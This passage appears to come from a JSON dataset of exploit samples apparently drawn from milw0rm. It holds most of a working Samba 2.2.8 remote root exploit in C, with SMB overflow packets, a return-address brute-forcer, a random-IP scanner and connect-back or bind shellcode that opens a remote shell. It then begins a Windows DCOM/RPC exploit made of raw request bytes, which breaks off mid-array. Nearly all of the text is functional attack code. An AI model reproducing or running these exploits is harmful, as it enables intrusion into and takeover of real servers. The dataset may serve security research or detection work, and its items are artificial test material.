fprintf(stderr, \"EOF\\n\");\n\n exit(2);\n\n }\n\n\n\n if (write(1, buff, n) < 0) break;\n\n }\n\n\n\n if (FD_ISSET(0, &fd_read)) {\n\n\n\n if((n = read(0, buff, 
sizeof(buff))) < 0){\n\n fprintf(stderr, \"EOF\\n\");\n\n exit(2);\n\n }\n\n\n\n if (send(sock, buff, n, 0) < 0) break;\n\n }\n\n\n\n usleep(10);\n\n }\n\n\n\n fprintf(stderr, \"Connection lost.\\n\\n\");\n\n exit(0);\n\n}\n\n\n\nvoid handler()\n\n{\n\n int sock = 0;\n\n int i = 0;\n\n OWNED = 1;\n\n\n\n for (i = 0; i < 100; i++)\n\n if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);\n\n\n\n if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n close(sock);\n\n exit(1);\n\n }\n\n\n\n if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {\n\n fprintf(stdout, \"+ Worked!\\n\"\n\n \"--------------------------------------------------------------\\n\");\n\n shell(sock);\n\n close(sock);\n\n }\n\n\n\n\n\n}\n\n\n\nint start_session(int sock)\n\n{\n\n char buffer[1000];\n\n char response[4096];\n\n char session_data1[] = \"\\x00\\xff\\x00\\x00\\x00\\x00\\x20\\x02\\x00\\x01\\x00\\x00\\x00\\x00\";\n\n char session_data2[] = \"\\x00\\x00\\x00\\x00\\x5c\\x5c\\x69\\x70\\x63\\x24\\x25\\x6e\\x6f\\x62\\x6f\\x64\\x79\"\n\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x49\\x50\\x43\\x24\";\n\n\n\n NETBIOS_HEADER *netbiosheader;\n\n SMB_HEADER *smbheader;\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x00;\n\n netbiosheader->length = htons(0x2E);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x73; /* session setup */\n\n smbheader->flags = 0x08; /* caseless pathnames */\n\n smbheader->flags2 = 0x01; /* long filenames supported */\n\n smbheader->pid = getpid() & 0xFFFF;\n\n smbheader->uid = 100;\n\n smbheader->mid = 0x01;\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);\n\n\n\n 
if(write_timer(sock, 3) == 1)\n\n if (send(sock, buffer, 50, 0) < 0) return -1;\n\n\n\n memset(response, 0x00, sizeof(response));\n\n\n\n if (read_timer(sock, 3) == 1)\n\n if (read(sock, response, sizeof(response) - 1) < 0) return -1;\n\n\n\n netbiosheader = (NETBIOS_HEADER *)response;\n\n smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));\n\n\n\n if (netbiosheader->type != 0x00) fprintf(stderr, \"+ Recieved a non session message\\n\");\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x00;\n\n netbiosheader->length = htons(0x3C);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x70; /* start connection */\n\n smbheader->pid = getpid() & 0xFFFF;\n\n smbheader->tid = 0x00;\n\n smbheader->uid = 100;\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);\n\n\n\n if(write_timer(sock, 3) == 1)\n\n if (send(sock, buffer, 64, 0) < 0) return -1;\n\n\n\n memset(response, 0x00, sizeof(response));\n\n\n\n if (read_timer(sock, 3) == 1)\n\n if (read(sock, response, sizeof(response) - 1) < 0) return -1;\n\n\n\n netbiosheader = (NETBIOS_HEADER *)response;\n\n smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));\n\n\n\n if (netbiosheader->type != 0x00) return -1;\n\n\n\n return 0;\n\n}\n\n\n\nint exploit_normal(int sock, unsigned long ret, char *shellcode)\n\n{\n\n\n\n char buffer[4000];\n\n char exploit_data[] =\n\n \"\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\n 
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\x00\\x00\\x90\";\n\n\n\n int i = 0;\n\n unsigned long dummy = ret - 0x90;\n\n\n\n NETBIOS_HEADER *netbiosheader;\n\n SMB_HEADER *smbheader;\n\n\n\n memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x04;\n\n netbiosheader->length = htons(2096);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x32; /* SMBtrans2 */\n\n smbheader->tid = 0x01;\n\n smbheader->uid = 100;\n\n\n\n memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);\n\n\n\n buffer[1096] = 0xEB;\n\n buffer[1097] = 0x70;\n\n\n\n for (i = 0; i < 4 * 24; i += 8) {\n\n memcpy(buffer + 1099 + i, &dummy, 4);\n\n memcpy(buffer + 1103 + i, &ret, 4);\n\n }\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), \n\n exploit_data, sizeof(exploit_data) - 1);\n\n memcpy(buffer + 1800, shellcode, strlen(shellcode));\n\n\n\n if(write_timer(sock, 3) == 1) {\n\n if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;\n\n return 0;\n\n }\n\n\n\n return -1;\n\n}\n\n\n\nint exploit_openbsd32(int sock, unsigned long ret, char *shellcode)\n\n{\n\n char buffer[4000];\n\n\n\n char exploit_data[] =\n\n \"\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n \"\\x00\\x00\\x00\\x90\";\n\n\n\n int i = 0;\n\n unsigned long dummy = ret - 0x30;\n\n NETBIOS_HEADER *netbiosheader;\n\n SMB_HEADER *smbheader;\n\n\n\n 
memset(buffer, 0x00, sizeof(buffer));\n\n\n\n netbiosheader = (NETBIOS_HEADER *)buffer;\n\n smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));\n\n\n\n netbiosheader->type = 0x00; /* session message */\n\n netbiosheader->flags = 0x04;\n\n netbiosheader->length = htons(2096);\n\n\n\n smbheader->protocol[0] = 0xFF;\n\n smbheader->protocol[1] = 'S';\n\n smbheader->protocol[2] = 'M';\n\n smbheader->protocol[3] = 'B';\n\n smbheader->command = 0x32; /* SMBtrans2 */\n\n smbheader->tid = 0x01;\n\n smbheader->uid = 100;\n\n\n\n memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);\n\n\n\n for (i = 0; i < 4 * 24; i += 4)\n\n memcpy(buffer + 1131 + i, &dummy, 4);\n\n\n\n memcpy(buffer + 1127, &ret, 4);\n\n\n\n memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),\n\n exploit_data, sizeof(exploit_data) - 1);\n\n\n\n memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));\n\n\n\n if(write_timer(sock, 3) == 1) {\n\n if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;\n\n return 0;\n\n }\n\n\n\n return -1;\n\n}\n\n\n\n\n\nint main (int argc,char *argv[])\n\n{\n\n char *shellcode = NULL;\n\n char scan_ip[256];\n\n\n\n int brute = -1;\n\n int connectback = 0;\n\n int force = 0;\n\n int i = 0;\n\n int ip1 = 0;\n\n int ip2 = 0;\n\n int ip3 = 0;\n\n int ip4 = 0;\n\n int opt = 0;\n\n int port = 139;\n\n int random = 0;\n\n int scan = 0;\n\n int sock = 0;\n\n int sock2 = 0;\n\n int status = 0;\n\n int type = 0;\n\n int verbose = 0;\n\n\n\n unsigned long BRUTE_DELAY = 100000;\n\n unsigned long ret = 0x0;\n\n unsigned long MAX_CHILDS = 40;\n\n unsigned long STEPS = 300;\n\n\n\n struct hostent *he;\n\n\n\n fprintf(stdout, \"samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\\n\"\n\n \"--------------------------------------------------------------\\n\");\n\n \n\n while((opt = getopt(argc,argv,\"b:B:c:C:d:fp:r:sS:t:v\")) !=EOF) {\n\n switch(opt) \n\n {\n\n case 'b':\n\n brute = atoi(optarg);\n\n 
if ((brute < 0) || (brute > 3)) {\n\n fprintf(stderr, \"Invalid platform.\\n\\n\");\n\n return -1;\n\n }\n\n break;\n\n case 'B':\n\n STEPS = atoi(optarg);\n\n if (STEPS == 0) STEPS++;\n\n break;\n\n case 'c':\n\n sscanf(optarg, \"%d.%d.%d.%d\", &ip1, &ip2, &ip3, &ip4);\n\n connectback = 1;\n\n\n\n if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {\n\n fprintf(stderr, \"Invalid IP address.\\n\\n\");\n\n return -1;\n\n }\n\n\n\n linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;\n\n linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;\n\n linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;\n\n linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;\n\n\n\n break;\n\n case 'C':\n\n MAX_CHILDS = atoi(optarg);\n\n if (MAX_CHILDS == 0) {\n\n fprintf(stderr, \"Invalid number of childs.\\n\");\n\n return -1;\n\n }\n\n\n\n if (MAX_CHILDS > 99) {\n\n fprintf(stderr, \"Too many childs, using 99. \\n\");\n\n MAX_CHILDS = 99;\n\n }\n\n\n\n break;\n\n case 'd':\n\n BRUTE_DELAY = atoi(optarg);\n\n break;\n\n case 'f':\n\n force = 1;\n\n break;\n\n case 'p':\n\n port = atoi(optarg);\n\n if ((port <= 0) || (port > 65535)) {\n\n fprintf(stderr, \"Invalid port.\\n\\n\");\n\n return -1;\n\n }\n\n break;\n\n case 'r':\n\n ret = strtoul(optarg, &optarg, 16);\n\n break;\n\n case 's':\n\n random = 1;\n\n scan = 1;\n\n break;\n\n case 'S':\n\n random = 0;\n\n scan = 1;\n\n sscanf(optarg, \"%d.%d.%d\", &ip1, &ip2, &ip3);\n\n ip3--;\n\n break;\n\n case 't':\n\n type = atoi(optarg);\n\n if (type == 0 || type > sizeof(targets) / 16) {\n\n for(i = 0; i < sizeof(targets) / 16; i++)\n\n fprintf(stdout, \"%02d. %s [0x%08x]\\n\", i + 1, targets[i].type, (unsigned int) targets[i].ret);\n\n fprintf(stderr, \"\\n\");\n\n return -1;\n\n }\n\n break;\n\n case 'v':\n\n verbose = 1;\n\n break;\n\n default:\n\n usage(argv[0] == NULL ? 
\"sambal\" : argv[0]);\n\n break;\n\n }\n\n\n\n }\n\n\n\n if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) \n\n usage(argv[0] == NULL ? \"sambal\" : argv[0]);\n\n\n\n if (scan == 1) \n\n fprintf(stdout, \"+ Scan mode.\\n\");\n\n if (verbose == 1)\n\n fprintf(stdout, \"+ Verbose mode.\\n\");\n\n\n\n if (scan == 1) {\n\n\n\n srand(getpid());\n\n\n\n while (1) {\n\n\n\n if (random == 1) {\n\n ip1 = rand() % 255;\n\n ip2 = rand() % 255;\n\n ip3 = rand() % 255; } \n\n else {\n\n ip3++;\n\n if (ip3 > 254) { ip3 = 1; ip2++; }\n\n if (ip2 > 254) { ip2 = 1; ip1++; }\n\n if (ip1 > 254) exit(0);\n\n }\n\n\n\n for (ip4 = 0; ip4 < 255; ip4++) {\n\n i++;\n\n snprintf(scan_ip, sizeof(scan_ip) - 1, \"%u.%u.%u.%u\", ip1, ip2, ip3, ip4);\n\n usleep(BRUTE_DELAY);\n\n\n\n switch (fork()) {\n\n case 0:\n\n switch(is_samba(scan_ip, 2)) {\n\n case 0:\n\n fprintf(stdout, \"+ [%s] Samba\\n\", scan_ip);\n\n break;\n\n case 1:\n\n fprintf(stdout, \"+ [%s] Windows\\n\", scan_ip);\n\n break;\n\n default:\n\n break; \n\n }\n\n\n\n exit(0);\n\n break;\n\n case -1:\n\n fprintf(stderr, \"+ fork() error\\n\");\n\n exit(-1);\n\n break;\n\n default:\n\n if (i > MAX_CHILDS - 2) { \n\n wait(&status); \n\n i--;\n\n }\n\n break;\n\n }\n\n }\n\n\n\n }\n\n\n\n return 0;\n\n }\n\n\n\n\n\n he = gethostbyname(argv[optind]);\n\n\n\n if (he == NULL) {\n\n fprintf(stderr, \"Unable to resolve %s...\\n\", argv[optind]);\n\n return -1;\n\n }\n\n\n\n if (brute == -1) {\n\n\n\n if (ret == 0) ret = targets[type - 1].ret;\n\n\n\n shellcode = targets[type - 1].shellcode;\n\n\n\n if (connectback == 1) {\n\n fprintf(stdout, \"+ connecting back to: [%d.%d.%d.%d:45295]\\n\", \n\n ip1, ip2, ip3, ip4);\n\n\n\n switch(targets[type - 1].os_type) {\n\n case 0: /* linux */\n\n shellcode = linux_connect_back;\n\n break;\n\n case 1: /* FreeBSD/NetBSD */\n\n shellcode = bsd_connect_back;\n\n break;\n\n case 2: /* OpenBSD */\n\n shellcode = bsd_connect_back;\n\n break;\n\n case 3: /* OpenBSD 3.2 
Non-exec stack */\n\n shellcode = bsd_connect_back;\n\n break;\n\n }\n\n\n\n }\n\n\n\n if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n fprintf(stderr, \"+ socket() error.\\n\");\n\n return -1;\n\n }\n\n\n\n if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n fprintf(stderr, \"+ socket() error.\\n\");\n\n return -1;\n\n }\n\n\n\n memcpy(&addr1.sin_addr, he->h_addr, he->h_length);\n\n memcpy(&addr2.sin_addr, he->h_addr, he->h_length);\n\n\n\n addr1.sin_family = AF_INET;\n\n addr1.sin_port = htons(port); \n\n addr2.sin_family = AF_INET;\n\n addr2.sin_port = htons(45295);\n\n\n\n if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { \n\n fprintf(stderr, \"+ connect() error.\\n\");\n\n return -1;\n\n }\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ %s\\n\", targets[type - 1].type);\n\n\n\n if (force == 0) {\n\n\n\n if (is_samba(argv[optind], 2) != 0) {\n\n fprintf(stderr, \"+ Host is not running samba!\\n\\n\");\n\n return -1;\n\n }\n\n\n\n fprintf(stderr, \"+ Host is running samba.\\n\");\n\n }\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ Connected to [%s:%d]\\n\", (char *)inet_ntoa(addr1.sin_addr), port);\n\n\n\n if (start_session(sock) < 0) fprintf(stderr, \"+ Session failed.\\n\");\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ Session enstablished\\n\");\n\n sleep(5);\n\n if (targets[type - 1].os_type != 2) {\n\n if (exploit_normal(sock, ret, shellcode) < 0) {\n\n fprintf(stderr, \"+ Failed.\\n\");\n\n close(sock);\n\n }\n\n } else {\n\n if (exploit_openbsd32(sock, ret, shellcode) < 0) {\n\n fprintf(stderr, \"+ Failed.\\n\");\n\n close(sock);\n\n }\n\n }\n\n\n\n sleep(2);\n\n\n\n if (connectback == 0) {\n\n if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {\n\n fprintf(stderr, \"+ Exploit failed, try -b to bruteforce.\\n\");\n\n\n\n return -1;\n\n }\n\n\n\n fprintf(stdout, \"--------------------------------------------------------------\\n\");\n\n\n\n shell(sock2);\n\n close(sock);\n\n close(sock2);\n\n } else {\n\n 
fprintf(stdout, \"+ Done...\\n\");\n\n close(sock2);\n\n close(sock);\n\n }\n\n return 0;\n\n }\n\n\n\n signal(SIGPIPE, SIG_IGN);\n\n signal(SIGUSR1, handler);\n\n\n\n switch(brute) {\n\n case 0:\n\n if (ret == 0) ret = 0xc0000000;\n\n shellcode = linux_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (Linux)\\n\");\n\n break;\n\n case 1:\n\n if (ret == 0) ret = 0xbfc00000;\n\n shellcode = bsd_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (FreeBSD / NetBSD)\\n\");\n\n break;\n\n case 2:\n\n if (ret == 0) ret = 0xdfc00000;\n\n shellcode = bsd_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (OpenBSD 3.1 and prior)\\n\");\n\n break;\n\n case 3:\n\n if (ret == 0) ret = 0x00170000;\n\n shellcode = bsd_bindcode;\n\n fprintf(stdout, \"+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\\n\");\n\n break;\n\n }\n\n\n\n memcpy(&addr1.sin_addr, he->h_addr, he->h_length);\n\n memcpy(&addr2.sin_addr, he->h_addr, he->h_length);\n\n\n\n addr1.sin_family = AF_INET;\n\n addr1.sin_port = htons(port);\n\n addr2.sin_family = AF_INET;\n\n addr2.sin_port = htons(45295);\n\n\n\n for (i = 0; i < 100; i++)\n\n childs[i] = -1;\n\n i = 0;\n\n\n\n if (force == 0) {\n\n if (is_samba(argv[optind], 2) != 0) {\n\n fprintf(stderr, \"+ Host is not running samba!\\n\\n\");\n\n return -1;\n\n }\n\n\n\n fprintf(stderr, \"+ Host is running samba.\\n\");\n\n }\n\n\n\n while (OWNED == 0) {\n\n\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n\n\n if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ socket() error.\\n\");\n\n }\n\n else { \n\n ret -= STEPS;\n\n i++;\n\n }\n\n\n\n if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)\n\n if (verbose == 1) fprintf(stderr, \"+ socket() error.\\n\");\n\n\n\n\n\n if ((ret & 0xff) == 0x00 && brute != 3) ret++;\n\n\n\n if (verbose == 1) fprintf(stdout, \"+ Using ret: [0x%08x]\\n\", (unsigned int)ret);\n\n\n\n usleep(BRUTE_DELAY);\n\n\n\n switch (childs[i] = fork()) {\n\n case 0:\n\n if(Connect(sock, 
(char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if(write_timer(sock, 3) == 1) {\n\n if (start_session(sock) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ Session failed.\\n\");\n\n if (sock > 2)close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if (brute == 3) {\n\n if (exploit_openbsd32(sock, ret, shellcode) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ Failed.\\n\");\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n } \n\n else {\n\n if (exploit_normal(sock, ret, shellcode) < 0) {\n\n if (verbose == 1) fprintf(stderr, \"+ Failed.\\n\");\n\n if (sock > 2) close(sock);\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if (sock > 2) close(sock);\n\n\n\n if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {\n\n if (sock2 > 2) close(sock2);\n\n exit(-1);\n\n }\n\n\n\n if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {\n\n if (sock2 > 2) close(sock2);\n\n kill(getppid(), SIGUSR1);\n\n }\n\n\n\n exit(1);\n\n }\n\n\n\n\n\n exit(0);\n\n break;\n\n case -1:\n\n fprintf(stderr, \"+ fork() error\\n\");\n\n exit(-1);\n\n break;\n\n default:\n\n if (i > MAX_CHILDS - 2) {\n\n wait(&status);\n\n i--;\n\n }\n\n break;\n\n }\n\n\n\n }\n\n\n\n }\n\n\n\n return 0;\n\n}\n\n\n\n// milw0rm.com [2003-04-10]", + "vulnerable": true + }, + { + "exploit_id": 100, + "content": "#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\nunsigned char 
bindstr[]={\n\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,\n\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,\n\n0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,\n\n0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\n\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\n\n\n\nunsigned char request1[]={\n\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03\n\n,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00\n\n,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45\n\n,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E\n\n,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D\n\n,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41\n\n,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00\n\n,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45\n\n,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00\n\n,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29\n\n,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00\n\n,0x00
,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF\n\n,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09\n\n,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00\n\n,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00\n\n,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00\n\n,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x
00,0x00\n\n,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E\n\n,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00\n\n,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00\n\n,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00\n\n,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00\n\n,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00